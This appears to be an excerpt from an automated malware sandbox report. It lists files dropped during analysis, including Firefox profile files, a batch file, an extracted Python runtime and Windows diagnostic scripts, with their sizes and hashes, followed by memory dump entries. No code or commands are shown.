64632fe30fb7d26644ebc9676830dfb6

SHA1
7a37d2ebd442141449cb51031c2703232ac0dbb9

SHA256
ec340de59807a7304e92e7738c833b0ed4ee47bd22e39da9a09a9a3fd313193a

SHA512
dc53288ac3a7553ee9212606960818edf40623c2e50f207a6aaa8776693def3403a1f52fdb780a40611caf9098113717b66f368c17edc8736f96b72d30e62cdf

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\sessionstore-backups\recovery.baklz4

Filesize
2KB

MD5
5a8acfc8f3fd16c35d30ebc8598fec70

SHA1
001917e90821044822673f2ac8ba12f4c2f9034a

SHA256
fe789dc48b27910cc0457ffec52f4b6dd7618f2e00afcd3c69612e9d0e1e5bcc

SHA512
c022d650d0e366492606b6aecfec749a2856fc31f14e448d8f6632bde58242fa1bd54af5d1a813e9481eb6895776e239b1b2518f9c6a4109c611e0af9bb0a8fb

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\sessionstore-backups\recovery.baklz4

Filesize
2KB

MD5
83ed5d5d6a7ec476e4f4c9e0133cb371

SHA1
165aa2e1e6b67cbced9dff3e92adaff04e3f4d5c

SHA256
1c8224070c4b8a0a2aff922933ed57efda4f0c678c06492047d126ab9e9a514e

SHA512
92864387dec5300308c299bc929f86fcc1f57959184e2483269611b30fa19da921c82212945195bb2a9ff95624fbe56ad31163c467b4be2b440eb9d6fc460391

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
624KB

MD5
5b1d034afc2344b8035de814b2aca90c

SHA1
66c398bf879e35b74b67a9b8475bcae997759072

SHA256
457a05c92500d49cde59b26cdca8aadbc8142d33a0520ef2d0a43f0fcc3b716a

SHA512
38731f84c2d91332cf9a1c085cc0417d415c4ceee24ff2d3904932ccc0b2ec3d05ca09273daad73d359e268e3a15840e2324b8f897debf241d2ac2a2384f090f

Download Submit
C:\Users\Admin\Downloads\2ZNqs7sT.lnk.part

Filesize
2KB

MD5
079f977c4cc3def9fe9922a9649649ae

SHA1
57abcf181b2c37f2b685aaf8f02cbb5c70419b70

SHA256
10c01f31e72aa9306eff1df475ecc8004478575eef6f8b95143928ba31c6dafb

SHA512
203f8f5f58b22f7a9927dd7d0139784f866a97b293113e87a78e2fec5bebea3c9d1fd34225e0378f2553a29072828a7a0bc823eb4850695b8729b30e591db306

Download Submit
C:\Users\Admin\Downloads\Extracted\lob\Python312\python.exe

Filesize
101KB

MD5
67d2e7c2c9737e21717a4d2336493adc

SHA1
46c8683e323c49c7093c7394c992420d37376e6e

SHA256
fd5c46d73d29ba21b04c844bbaf9096066136526911230645a2a040d23fb612b

SHA512
36f7e98fcca905f8207d6165dec4e75f17afc139c29ed3c44d29726cb1978ac6451dd28ddc2d65a1333eb10856410c6b6ec7ae802f54d8fd54de79be31f20c4f

Download Submit
C:\Users\Admin\Downloads\Extracted\lob\Python312\python312._pth

Filesize
80B

MD5
535c72e819d6b1e99fc4e85d68784e78

SHA1
01325ced71fd06fd22f453e68f4e41c48223a090

SHA256
2820f241bc9d6810d4db21c21cca3845799367fbdf0199620fb37c86a74b945c

SHA512
83ddff71dce6ddf7c7e8e2dacf2188ec38f60d32f569a77df5d7a8d6e10f7f9cbe1a0a57759a5b7886f81deb6f47cbdab6893ccaec6af2df18babece9466e10a

Download Submit
C:\Users\Admin\Downloads\Extracted\lob\Python312\python312.dll

Filesize
6.6MB

MD5
d521654d889666a0bc753320f071ef60

SHA1
5fd9b90c5d0527e53c199f94bad540c1e0985db6

SHA256
21700f0bad5769a1b61ea408dc0a140ffd0a356a774c6eb0cc70e574b929d2e2

SHA512
7a726835423a36de80fb29ef65dfe7150bd1567cac6f3569e24d9fe091496c807556d0150456429a3d1a6fd2ed0b8ae3128ea3b8674c97f42ce7c897719d2cd3

Download Submit
C:\Users\Admin\Downloads\Extracted\lob\Python312\python312.zip

Filesize
3.7MB

MD5
bbe638683b65d68e643f130eefdd78fd

SHA1
d19238067645b81c78a583afbcb3c68807a40cd7

SHA256
2331635c9f558b4ee3f87118c89e2f96aa68137e288645137a39dce9d13a9e64

SHA512
abdfb8a72a372045fd37fd0d1f7bcbee931ffd3a10722ac4cd285d950f4a01b5abe4aa7e730c7d2a8035425099292b88e1b6b8e07b1ef3591b0e96b5c19d3ddc

Download Submit
C:\Users\Admin\Downloads\Extracted\lob\Python312\vcruntime140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\Downloads\ban.zip

Filesize
19.7MB

MD5
e3dd46f757b5e97f3de1eda54db78044

SHA1
34546b055cbcebb09c22fb4048fe0068153b3bc8

SHA256
6cea485ebdaabac42296d07089361d7e745ec1be124bdc0cc45c654fb783dfe3

SHA512
ea53a5bfd3cfbcda55222fc7b2b0c47f54e61a032e74b720b617a35004c725697871274f7d790ee79b5bab68d9ea4aa0e561c18adcb59f6e4ece1512922a7277

Download Submit
C:\Users\Admin\gb.bat

Filesize
35KB

MD5
2a780d12cca7795587d6b11b8ca214f6

SHA1
f4ceac30a12f365439fe24072af7cabd69ac408a

SHA256
fdbbe6d9521b094b50a508544870a5f26f85bb9a69518c5d7f4d9d8910766704

SHA512
53f1f31fe9df8ee07b76ec977d57489dd899592b91e1034c28c1b6bb850567caed34a0559277a9a9cbf0189b0b5ec09fc0640bed0f710d17e66591573c25d1ad

Download Submit
C:\Windows\TEMP\SDIAG_ae35666f-041e-4ce5-ad51-795745bc211a\NetworkDiagnosticsTroubleshoot.ps1

Filesize
25KB

MD5
d0cfc204ca3968b891f7ce0dccfb2eda

SHA1
56dad1716554d8dc573d0ea391f808e7857b2206

SHA256
e3940266b4368c04333db89804246cb89bf2073626f22b8de72bea27c522282a

SHA512
4d2225b599ad8af8ba8516f12cfddca5ec0ce69c5c80b133a6a323e9aaf5e0312efbcfa54d2e4462a5095f9a7c42b9d5b39f3204e0be72c3b1992cf33b22087c

Download Submit
C:\Windows\TEMP\SDIAG_ae35666f-041e-4ce5-ad51-795745bc211a\UtilityFunctions.ps1

Filesize
53KB

MD5
c912faa190464ce7dec867464c35a8dc

SHA1
d1c6482dad37720db6bdc594c4757914d1b1dd70

SHA256
3891846307aa9e83bca66b13198455af72af45bf721a2fbd41840d47e2a91201

SHA512
5c34352d36459fd8fcda5b459a2e48601a033af31d802a90ed82c443a5a346b9480880d30c64db7ad0e4a8c35b98c98f69eceedad72f2a70d9c6cca74dce826a

Download Submit
C:\Windows\TEMP\SDIAG_ae35666f-041e-4ce5-ad51-795745bc211a\UtilitySetConstants.ps1

Filesize
2KB

MD5
0c75ae5e75c3e181d13768909c8240ba

SHA1
288403fc4bedaacebccf4f74d3073f082ef70eb9

SHA256
de5c231c645d3ae1e13694284997721509f5de64ee5c96c966cdfda9e294db3f

SHA512
8fc944515f41a837c61a6c4e5181ca273607a89e48fbf86cf8eb8db837aed095aa04fc3043029c3b5cb3710d59abfd86f086ac198200f634bfb1a5dd0823406b

Download Submit
C:\Windows\TEMP\SDIAG_ae35666f-041e-4ce5-ad51-795745bc211a\en-US\LocalizationData.psd1

Filesize
5KB

MD5
380768979618b7097b0476179ec494ed

SHA1
af2a03a17c546e4eeb896b230e4f2a52720545ab

SHA256
0637af30fc3b3544b1f516f6196a8f821ffbfa5d36d65a8798aeeadbf2e8a7c2

SHA512
b9ef59e9bfdbd49052a4e754ead8cd54b77e79cc428e7aee2b80055ff5f0b038584af519bd2d66258cf3c01f8cc71384f6959ee32111eac4399c47e1c2352302

Download Submit
C:\Windows\Temp\SDIAG_ae35666f-041e-4ce5-ad51-795745bc211a\DiagPackage.dll

Filesize
478KB

MD5
580dc3658fa3fe42c41c99c52a9ce6b0

SHA1
3c4be12c6e3679a6c2267f88363bbd0e6e00cac5

SHA256
5b7aa413e4a64679c550c77e6599a1c940ee947cbdf77d310e142a07a237aad2

SHA512
68c52cd7b762b8f5d2f546092ed9c4316924fa04bd3ab748ab99541a8b4e7d9aec70acf5c9594d1457ad3a2f207d0c189ec58421d4352ddbc7eae453324d13f2

Download Submit
C:\Windows\Temp\SDIAG_ae35666f-041e-4ce5-ad51-795745bc211a\en-US\DiagPackage.dll.mui

Filesize
17KB

MD5
44c4385447d4fa46b407fc47c8a467d0

SHA1
41e4e0e83b74943f5c41648f263b832419c05256

SHA256
8be175e8fbdae0dade54830fece6c6980d1345dbeb4a06c07f7efdb1152743f4

SHA512
191cd534e85323a4cd9649a1fc372312ed4a600f6252dffc4435793650f9dd40d0c0e615ba5eb9aa437a58af334146aac7c0ba08e0a1bf24ec4837a40f966005

Download Submit
memory/208-1625-0x00000225A4600000-0x00000225A4660000-memory.dmp

Filesize
384KB

Download
memory/644-973-0x00000292A13A0000-0x00000292A1416000-memory.dmp

Filesize
472KB

Download
memory/644-1503-0x0000029287F90000-0x0000029288A51000-memory.dmp

Filesize
10.8MB

Download
memory/644-1298-0x0000029287F90000-0x0000029288A51000-memory.dmp

Filesize
10.8MB

Download
memory/644-1297-0x0000029287F90000-0x0000029288A51000-memory.dmp

Filesize
10.8MB

Download
memory/644-1295-0x0000029287F90000-0x0000029288A51000-memory.dmp

Filesize
10.8MB

Download
memory/644-1283-0x0000029287F90000-0x0000029288A51000-memory.dmp

Filesize
10.8MB

Download
memory/644-1282-0x0000029287F90000-0x0000029288A51000-memory.dmp

Filesize
10.8MB

Download
memory/644-1277-0x0000029287F90000-0x0000029288A51000-memory.dmp

Filesize
10.8MB

Download
memory/644-1274-0x0000029287F90000-0x0000029288A51000-memory.dmp

Filesize
10.8MB

Download
memory/644-1272-0x0000029287F90000-0x0000029288A51000-memory.dmp

Filesize
10.8MB

Download
memory/644-1271-0x0000029287F90000-0x0000029288A51000-memory.dmp

Filesize
10.8MB

Download
memory/644-1260-0x0000029287F90000-0x0000029288A51000-memory.dmp

Filesize
10.8MB

Download
memory/644-1258-0x0000029287F90000-0x0000029288A51000-memory.dmp

Filesize
10.8MB

Download
memory/644-1255-0x0000029287F90000-0x0000029288A51000-memory.dmp

Filesize
10.8MB

Download
memory/644-1254-0x0000029287F90000-0x0000029288A51000-memory.dmp

Filesize
10.8MB

Download
memory/644-1304-0x0000029287F90000-0x0000029288A51000-memory.dmp

Filesize
10.8MB

Download
memory/644-1986-0x0000029287F90000-0x0000029288A51000-memory.dmp

Filesize
10.8MB

Download
memory/644-1148-0x0000029287F90000-0x0000029288A51000-memory.dmp

Filesize
10.8MB

Download
memory/644-1134-0x0000029287F90000-0x0000029288A51000-memory.dmp

Filesize
10.8MB

Download
memory/644-1008-0x00000292A1360000-0x00000292A137E000-memory.dmp

Filesize
120KB

Download
memory/644-1006-0x0000029287F90000-0x0000029288A51000-memory.dmp

Filesize
10.8MB

Download
memory/644-1003-0x0000029287F90000-0x0000029288A51000-memory.dmp

Filesize
10.8MB

Download
memory/644-995-0x0000029287F90000-0x0000029288A51000-memory.dmp

Filesize
10.8MB

Download
memory/644-979-0x0000029287F90000-0x0000029288A51000-memory.dmp

Filesize
10.8MB

Download
memory/644-1479-0x0000029287F90000-0x0000029288A51000-memory.dmp

Filesize
10.8MB

Download
memory/644-972-0x00000292A12D0000-0x00000292A1314000-memory.dmp

Filesize
272KB

Download
memory/644-1495-0x0000029287F90000-0x0000029288A51000-memory.dmp

Filesize
10.8MB

Download
memory/644-2024-0x0000029287F90000-0x0000029288A51000-memory.dmp

Filesize
10.8MB

Download
memory/644-2027-0x0000029287F90000-0x0000029288A51000-memory.dmp

Filesize
10.8MB

Download
memory/2068-1636-0x0000020CE72A0000-0x0000020CE72BA000-memory.dmp

Filesize
104KB

Download
memory/2068-1638-0x0000020CE8DE0000-0x0000020CE8DF6000-memory.dmp

Filesize
88KB

Download
memory/2376-1629-0x000002A041480000-0x000002A0414E3000-memory.dmp

Filesize
396KB

Download
memory/2448-1633-0x00000257A8780000-0x00000257A87E0000-memory.dmp

Filesize
384KB

Download
memory/4200-1631-0x0000014C21380000-0x0000014C2139C000-memory.dmp

Filesize
112KB

Download
memory/4200-1634-0x0000014C22EB0000-0x0000014C22EC8000-memory.dmp

Filesize
96KB

Download
memory/4636-920-0x000002550C370000-0x000002550C371000-memory.dmp

Filesize
4KB

Download
memory/4636-915-0x000002550C370000-0x000002550C371000-memory.dmp

Filesize
4KB

Download
memory/4636-919-0x000002550C370000-0x000002550C371000-memory.dmp

Filesize
4KB

Download
memory/4636-922-0x000002550C370000-0x000002550C371000-memory.dmp

Filesize
4KB

Download
memory/4636-913-0x000002550C370000-0x000002550C371000-memory.dmp

Filesize
4KB

Download
memory/4636-914-0x000002550C370000-0x000002550C371000-memory.dmp

Filesize
4KB

Download
memory/4636-921-0x000002550C370000-0x000002550C371000-memory.dmp

Filesize
4KB

Download
memory/4636-923-0x000002550C370000-0x000002550C371000-memory.dmp

Filesize
4KB

Download
memory/4636-925-0x000002550C370000-0x000002550C371000-memory.dmp

Filesize
4KB

Download
memory/4636-924-0x000002550C370000-0x000002550C371000-memory.dmp

Filesize
4KB

Download
memory/4672-371-0x00000234A4E80000-0x00000234A4EA2000-memory.dmp

Filesize
136KB

Download
memory/5100-2021-0x0000000002E00000-0x00000000038C1000-memory.dmp

Filesize
10.8MB

Download
memory/5100-1652-0x000000001CF50000-0x000000001D0D8000-memory.dmp

Filesize
1.5MB

Download
memory/5100-1658-0x0000000002E00000-0x00000000038C1000-memory.dmp

Filesize
10.8MB

Download
memory/5100-1657-0x0000000002DE0000-0x0000000002DEA000-memory.dmp

Filesize
40KB

Download
memory/5100-2026-0x0000000002E00000-0x00000000038C1000-memory.dmp

Filesize
10.8MB

Download
memory/5100-1630-0x0000000002C50000-0x0000000002C66000-memory.dmp

Filesize
88KB

Download
memory/5100-1627-0x0000000000D60000-0x0000000000D7A000-memory.dmp

Filesize
104KB

Download
memory/5100-2029-0x0000000002E00000-0x00000000038C1000-memory.dmp

Filesize
10.8MB

Download
memory/5100-1989-0x000000001CCD0000-0x000000001CD4A000-memory.dmp

Filesize
488KB

Download
memory/5376-1161-0x00000128FFEE0000-0x00000128FFEEA000-memory.dmp

Filesize
40KB

Download
memory/5376-1160-0x0000012900000000-0x0000012900012000-memory.dmp

Filesize
72KB

Download
memory/5776-2009-0x0000000002E20000-0x00000000038E1000-memory.dmp

Filesize
10.8MB

Download
memory/5776-1651-0x0000000002E20000-0x00000000038E1000-memory.dmp

Filesize
10.8MB

Download
memory/5776-1626-0x0000000002C60000-0x0000000002C6E000-memory.dmp

Filesize
56KB

Download
memory/5776-2025-0x0000000002E20000-0x00000000038E1000-memory.dmp

Filesize
10.8MB

Download
memory/5776-1623-0x0000000000D80000-0x0000000000D92000-memory.dmp

Filesize
72KB

Download
memory/5776-2028-0x0000000002E20000-0x00000000038E1000-memory.dmp

Filesize
10.8MB

Download
memory/5948-1620-0x0000021A91050000-0x0000021A910A8000-memory.dmp

Filesize
352KB

Download